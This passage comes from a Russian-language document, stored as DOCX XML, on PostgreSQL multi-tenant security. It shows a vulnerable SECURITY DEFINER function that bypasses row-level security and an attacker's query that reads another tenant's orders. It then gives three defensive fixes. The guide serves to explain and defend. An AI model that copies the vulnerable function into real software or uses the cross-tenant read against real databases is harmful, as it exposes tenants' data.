    <w:p w14:paraId="5BEE8E0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ возвращает ВСЕ rows app.orders → cross-tenant aggregate leak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69CC755E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Альтернативный payload — direct read через row-level SECURITY DEFINER</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BF7F86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Ещё более прямой пример: SD-функция возвращающая row-level data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448C127E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_order_details(p_order_id int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAE4B4E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS app.orders LANGUAGE plpgsql SECURITY DEFINER AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558BDFE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72188DD5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result app.orders;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33060F14" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A7D3EEC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT * INTO result FROM app.orders WHERE id = p_order_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E3903F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12217052" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DEAC72" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248A53CD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69BDB6C3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Атакующий вызывает с произвольным order_id из другого tenant:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E194822" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM app.get_order_details(99999);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF10C68" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- ↑ owner функции = postgres → bypass RLS → возвращает order независимо от tenant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C75B345" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Защита — три уровня</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6B2E77" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень 1 — `FORCE ROW LEVEL SECURITY` на таблицу:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE26140" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ALTER TABLE app.orders FORCE ROW LEVEL SECURITY;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B99BCE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- Теперь даже owner (postgres, superuser) подвержен RLS-policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129B1996" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- SECURITY DEFINER функция должна явно set tenant_id или fail RLS check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63314A9C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень 2 — явный фильтр внутри SD-функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75082892" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_order_summary_safe(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55096A70" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65453F33" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql SECURITY DEFINER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9672AD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SET search_path = pg_catalog, pg_temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BA26F3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A74F26C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>DECLARE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5384F146" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    caller_tenant int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E28F4AE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743F806A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    -- Явная проверка caller-tenant из session-variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432E4E1B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    caller_tenant := current_setting('jwt.tenant_id', true)::int;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6277355A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    IF caller_tenant IS NULL THEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1246ABD8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        RAISE EXCEPTION 'caller tenant not set';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C3B3165" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    END IF;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E2C4CF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27A5203A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D2218C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C5DAE7C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00FB8E7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    WHERE status = p_status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D95F0CE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">      AND tenant_id = caller_tenant;  -- ← explicit filter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C43ECCD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E02ADF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D981E8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>explicit re-implementation</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> RLS policy внутри функции. Pattern для случаев, где FORCE RLS не подходит (например, функция должна делать cross-tenant operations для admin-roles но не для regular tenants).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21597368" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Уровень 3 — SECURITY INVOKER вместо SECURITY DEFINER (когда возможно):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAD1340" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE OR REPLACE FUNCTION app.get_order_summary_v3(p_status text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC8807A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS TABLE(total_count bigint, total_amount numeric)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF59678" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LANGUAGE plpgsql</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A64BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-- НЕТ SECURITY DEFINER → SECURITY INVOKER (default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D179D46" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF94E83" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7045C763" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    RETURN QUERY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFF0BF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    SELECT count(*), COALESCE(sum(amount), 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="367AC4E5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    FROM app.orders</w:t>
      </w:r>
    </w:p>
